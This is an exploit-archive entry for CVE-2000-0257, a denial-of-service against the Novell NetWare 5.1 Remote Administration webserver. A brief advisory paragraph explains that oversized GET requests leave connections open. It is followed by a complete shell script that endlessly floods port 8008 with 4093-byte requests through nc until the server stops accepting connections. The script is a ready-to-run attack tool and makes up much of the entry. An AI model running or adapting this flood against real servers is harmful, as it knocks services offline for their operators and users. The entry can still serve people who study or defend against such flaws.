Novell Netware 5.1 - Remote Administration Buffer Overflow
Author: Michal Zalewski
type: dos
platform: netware
port:
date_added: 2000-04-19
date_updated: 2012-07-15
verified: 1
codes: CVE-2000-0257;OSVDB-1286
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/1118/info
The Netware Remote Administration utility can be compromised to allow arbitrary code to be remotely run on the server.
The Remote Administration server is basically a simple webserver, and if sent a GET request of between 4 and 8 kb, some of the data gets written to executable registers.
Even without executable code being sent, this can lead to a DoS as although the server will not crash, the connection will not be aborted or cleaned. Therefore, these failed requests can be made repeatedly until the TCP/IP subsystem will no longer accept connection requests.
#!/bin/sh
SERVER=127.0.0.1
PORT=8008
WAIT=3
DUZOA=`perl -e '{print "A"x4093}'`
MAX=30
while :; do
ILE=0
while [ $ILE -lt $MAX ]; do
(
(
echo "GET /"
echo $DUZOA
echo
) | nc $SERVER $PORT &
sleep $WAIT
kill -9 $!
) &>/dev/null &
ILE=$[ILE+1]
done
sleep $WAIT
done